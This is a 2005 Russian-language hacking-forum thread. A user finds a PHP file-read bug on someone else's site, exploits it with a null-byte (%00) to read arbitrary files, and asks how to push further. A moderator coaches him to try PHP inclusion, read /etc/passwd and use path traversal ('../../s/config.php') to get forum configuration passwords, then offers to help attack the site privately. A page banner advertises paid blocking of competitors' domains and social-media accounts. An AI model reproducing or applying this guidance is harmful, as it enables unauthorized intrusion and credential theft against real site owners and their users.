Форум АНТИЧАТ - %00 в сайте

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
%00 в сайте

Опции темы

Поиск в этой теме

Опции просмотра

%00 в сайте

24.12.2005, 23:19

wsr

Новичок

Регистрация: 20.04.2005

Сообщений: 9

Провел на форуме:
16469

Репутация: 0

%00 в сайте

Прива всем!
Нашел сайт, который читает информацию из файлов так:
http:/*.*/index.php?page=now
<?
$f = fopen ("$page.txt","r+");
while (!feof($f))
{
$s = fgets($f,255);
echo $s;
}
?>

Используюя багу (нулл-байт [%00]) я могу читать любые файлы (http:/*.*/index.php?page=index.php%00 - выведет index.php на экран)
А что нить кроме чтения файлов с этого можно поиметь?

Чтение etc/shadow, passwd не предлагать!
{Hack detected. Contact the support.}

Последний раз редактировалось wsr; 24.12.2005 в 23:27..

24.12.2005, 23:27

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

в принципе да...
попробуй провести php-инклудинг... и прочесть файлик /etc/passwd =)
посмотри есть ли на этом сайте форум какой-нить.. с форума можно будет прочесть всякие config.php =)) вобщем, ищи пароли))

24.12.2005, 23:30

wsr

Новичок

Регистрация: 20.04.2005

Сообщений: 9

Провел на форуме:
16469

Репутация: 0

Форум - phpbb какой-то!
Посмотрю конфиги! Гыыы

24.12.2005, 23:31

wsr

Новичок

Регистрация: 20.04.2005

Сообщений: 9

Провел на форуме:
16469

Репутация: 0

Где конфиг лежит нашел! Только открыть не могу!
Короче viktim.com
/home2/viktim/public_html/index.php - тут бага!
Форум forum.viktim.com/s/
а как к нему путь?
Пробовал так :/home2/viktim/public_html/forum/s/ - ничего не находит! Даже index.php

Последний раз редактировалось wsr; 24.12.2005 в 23:49..

25.12.2005, 00:57

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

вообще-то ты неправильно пробуешь..
ты же должен искать файлы через свою багу.. т.е. писать не весь абс. путь, а путь, относительно бажного скрипта.. т.е.
index.php?page=../../s/config.php - например так..

25.12.2005, 01:27

wsr

Новичок

Регистрация: 20.04.2005

Сообщений: 9

Провел на форуме:
16469

Репутация: 0

да я уже и так и так пробовал! Толку никакого!
page=../../s/index.php
page=../s/index.php
page=s/index.php
page=forum/s/index.php
page=../forum/s/index.php
page=../../forum/s/index.php

25.12.2005, 01:28

Rebz

Super Moderator

Регистрация: 08.11.2004

Сообщений: 3,395

Провел на форуме:
13166814

Репутация: 3876

ну если хочешь, можешь мне в ПМ кинуть ссылку, вместе посмотрим чё там есть -)

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
XSS на сайте "Пентагона". Анархия в зоне "gov".	k00p3r	Уязвимости	8	16.03.2006 02:40
Xss на сайте Пентагона	XgLuiR	Мировые новости	4	10.11.2005 14:42
Реклама на сайте с посещаемостью от 1000 чел\сутки	Toys2004	Разное - Покупка, продажа, обмен	15	13.08.2005 18:53

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход